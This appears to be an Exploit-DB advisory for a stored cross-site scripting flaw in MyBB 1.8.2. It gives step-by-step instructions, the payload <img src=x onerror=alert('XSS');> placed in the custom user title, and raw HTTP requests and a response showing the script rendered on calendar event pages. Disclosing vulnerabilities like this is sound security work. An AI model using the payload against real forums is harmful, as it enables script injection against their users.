MyBB Forums 1.8.2 - Persistent Cross-Site Scripting

EDB-ID:

35266

CVE:

N/A




Platform:

PHP

Date:

2014-11-17


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

*# Exploit Title*:[Stored XSS vulnerability in MyBB 1.8.2
*# Date:* 16th November'2014
*# Exploit Author:* Avinash Kumar Thapa
*# Vendor Homepage:* http://www.mybb.com/
*# Software Link*: http://www.mybb.com/download/
*# Version:* MyBB 1.8.2 (latest)
*# Tested on:*
   * Operating System*: Windows 8.1
   * Browser Used* : Mozilla Firefox 33.1  (localhost)
####################################################################################

The latest version of MyBB forums(1.8.2) is vulnerable to Stored Cross-Site
Scripting(XSS) vulnerability and Complete Proof of Concept is shown below:

*Stored XSS:*

*Step1: * Create a user account and go to *User CP >Edit Profile > **Custom
User Title*

*Vector Used : <img src=x onerror=alert('XSS');>*

*Post Request*

 *POST /fuck/Upload/usercp.php HTTP/1.1*
*Host: localhost*
*User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101
Firefox/33.0*
*Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8*
*Accept-Language: en-US,en;q=0.5*
*Accept-Encoding: gzip, deflate*
*Referer: http://localhost/fuck/Upload/usercp.php?action=profile
<http://localhost/fuck/Upload/usercp.php?action=profile>*
*Cookie: adminsid=d926efdecaa86cdba516a78abef57b47; acploginattempts=0;
mybb[lastvisit]=1416124581; mybb[lastactive]=1416126977; mybb[referrer]=1;
loginattempts=1; sid=c1ec3cf334b129e0f7e58f9ca9971aeb;
mybbuser=2_FWzmPOn8tKQhMm2urQwtHHx3iAJDWoB5kbyjjB2xwmbTXPpeAx*
*Connection: keep-alive*
*Content-Type: application/x-www-form-urlencoded*
*Content-Length: 382*

*my_post_key=6fa6202df4adac5d50bd19b0c1204992&bday1=&bday2=&bday3=&birthdayprivacy=all&website=http%3A%2F%2F&profile_fields%5Bfid1%5D=&profile_fields%5Bfid2%5D=&profile_fields%5Bfid3%5D=Undisclosed&usertitle=%3Cimg+src%3Dx+onerror%3Dalert%28%27XSS%27%29%3B%3E&icq=&aim=&yahoo=&skype=&google=&away=0&awayreason=&awayday=&awaymonth=&awayyear=&action=do_profile®submit=Update+Profile*

*Step 2: Go to http://localhost/fuck/upload/calendar.php
<http://localhost/fuck/upload/calendar.php>*
*Step 3: Create any event on any date and click on event.*

*REQUEST*

*GET /fuck/Upload/calendar.php?action=event&eid=9 HTTP/1.1*
*Host: localhost*
*User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101
Firefox/33.0*
*Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8*
*Accept-Language: en-US,en;q=0.5*
*Accept-Encoding: gzip, deflate*
*Referer: http://localhost/fuck/Upload/calendar.php
<http://localhost/fuck/Upload/calendar.php>*
*Cookie: adminsid=d926efdecaa86cdba516a78abef57b47; acploginattempts=0;
mybb[lastvisit]=1416124581; mybb[lastactive]=1416126977; mybb[referrer]=1;
loginattempts=1; sid=c1ec3cf334b129e0f7e58f9ca9971aeb;
mybbuser=2_FWzmPOn8tKQhMm2urQwtHHx3iAJDWoB5kbyjjB2xwmbTXPpeAx*
*Connection: keep-alive*

*RESPONSE:*

HTTP/1.1 200 OK
Date: Sun, 16 Nov 2014 09:37:46 GMT
Server: Apache/2.4.10 (Win32) OpenSSL/1.0.1i PHP/5.5.15
X-Powered-By: PHP/5.5.15
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 11336

[SNIP]

<strong><span class="largetext"><a href="
http://localhost/fuck/Upload/member.php?action=profile&uid=3">avinash</a></span></strong><br
/>
<span class="smalltext">
<img src=x onerror=alert('XSS');><br />
<img src="images/star.png" border="0" alt="*" /><img src="images/star.png"
border="0" alt="*" /><img src="images/star.png" border="0" alt="*" /><img
src="images/star.png" border="0" alt="*" /><img src="images/star.png"
border="0" alt="*" /><br />
</span>
</div>
<div class="float_right" style="text-align: right;">


[snip]

Only XSS response is shown here :) not complete response to avoid junk :)

*Recommendation: *Upgrade MyBB 1.8.2  :)


*By:*
*Avinash Kumar Thapa  a.k.a "-Acid" or "SPID3R"*

*Twitter: * https://twitter.com/m_avinash143
Facebook:https://www.facebook.com/M.avinash143

That's all for the day
Enjoy